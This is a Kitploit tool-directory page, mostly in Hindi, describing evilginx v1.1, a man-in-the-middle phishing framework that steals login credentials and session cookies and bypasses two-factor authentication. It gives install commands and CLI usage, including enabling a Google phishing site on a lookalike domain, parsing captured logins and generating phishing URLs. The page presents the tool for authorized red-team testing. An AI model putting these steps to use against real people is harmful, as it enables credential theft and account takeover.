Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
evilginx — कृपया नया संस्करण उपयोग करें: https://github.com/kgretzky/evilginx2 | Kitploit
उपकरण/GitHubGitHub/kgretzky/evilginx
फ़िशिंग उपकरणवेब एप्लिकेशन शोषणफिशिंगपेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंगप्रमाणीकरणरेड टीमिंग
GitHubkgretzky/evilginx

evilginx

कृपया नया संस्करण उपयोग करें: https://github.com/kgretzky/evilginx2

रिपॉजिटरी देखें
1.2k2818 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Evilginx v.1.1.0

Evilginx

यह संस्करण पुराना है। कृपया नवीनतम संस्करण का उपयोग करें!

EVILGINX 2: https://github.com/kgretzky/evilginx2

Evilginx एक मैन-इन-द-मिडिल हमला ढांचा है जिसका उपयोग किसी भी वेब सेवा के क्रेडेंशियल्स और सत्र कुकीज़ को फ़िश करने के लिए किया जाता है। इसका कोर Nginx HTTP सर्वर पर चलता है, जो proxy_pass और sub_filter का उपयोग करके HTTP सामग्री को प्रॉक्सी और संशोधित करता है, जबकि क्लाइंट और सर्वर के बीच ट्रैफ़िक को इंटरसेप्ट करता है।

आप मेरे ब्लॉग पर जान सकते हैं कि यह कैसे काम करता है और सब कुछ स्वयं कैसे स्थापित करें:

पहली पोस्ट अब थोड़ी पुरानी: Evilginx - Advanced Phishing With Two-factor Authentication Bypass

Evilginx 1.0 अपडेट: Evilginx 1.0 Update - Up Your Game in 2FA Phishing

Evilginx 1.1 अपडेट: Evilginx 1.1 Update

अस्वीकरण

मैं जानता हूँ कि Evilginx का उपयोग बहुत ही नेफ़रियस उद्देश्यों के लिए किया जा सकता है। यह कार्य केवल एक प्रदर्शन है कि कुशल हमलावर क्या कर सकते हैं। रक्षक की जिम्मेदारी है कि वह रक्षा स्थापित करते समय ऐसे हमलों पर विचार करे और इस फ़िशिंग विधि से बचाव के तरीके खोजे। Evilginx का उपयोग केवल वैध पैठ परीक्षण कार्यों में ही किया जाना चाहिए, फ़िश किए जाने वाले पक्षों से लिखित अनुमति के साथ।

योगदानकर्ता हॉल ऑफ फ़ेम

@poweroftrue

स्थापना

Evilginx एक इंस्टॉलेशन स्क्रिप्ट install.sh प्रदान करता है जो किसी भी Debian wheezy/jessie मशीन पर पूरे पैकेज को फ़ायर और फ़ॉरगेट तरीके से इंस्टॉल करने का ध्यान रखता है।

root@kitploit:~
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh

उपयोग

root@kitploit:~
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit
सेटअप

sites निर्देशिका से दिए गए Evilginx टेम्पलेट का उपयोग करके Nginx सर्वर के साथ उपयोग के लिए साइट कॉन्फ़िगरेशन सक्षम या अक्षम करें।

root@kitploit:~
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

उपलब्ध साइट कॉन्फ़िगरेशन टेम्पलेट सूचीबद्ध करें:

root@kitploit:~
python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

पूर्व-पंजीकृत फ़िशिंग डोमेन not-really-google.com के साथ google फ़िशिंग साइट सक्षम करें:

root@kitploit:~
python evilginx.py setup --enable google -d not-really-google.com

facebook फ़िशिंग साइट अक्षम करें:

root@kitploit:~
python evilginx.py setup --disable facebook
पार्स करें

इंटरसेप्ट किए गए लॉगिन क्रेडेंशियल्स और सत्र कुकीज़ निकालने के लिए Nginx लॉग पार्स करें। डिफ़ॉल्ट रूप से, लॉग logs निर्देशिका में सहेजे जाते हैं, जहाँ evilginx.py स्क्रिप्ट स्थित है। सेटअप चरण में स्वचालित पार्सिंग सक्षम करने के बाद यह स्वचालित रूप से किया जा सकता है।

root@kitploit:~
usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

केवल google साइट के लिए लॉग पार्स करें:

root@kitploit:~
python evilginx.py parse -s google

सभी उपलब्ध साइटों के लिए लॉग पार्स करें:

root@kitploit:~
python evilginx.py parse -s all
URL जनरेट करें

फ़िशिंग URL जनरेट करें जिनका उपयोग आप अपने रेड टीम आकलन में कर सकते हैं।

root@kitploit:~
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.

google फ़िशिंग URL जनरेट करें जो सफल लॉगिन पर पीड़ित को rick'roll वीडियो पर पुनर्निर्देशित करेगा:

root@kitploit:~
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
टूल डाउनलोड करें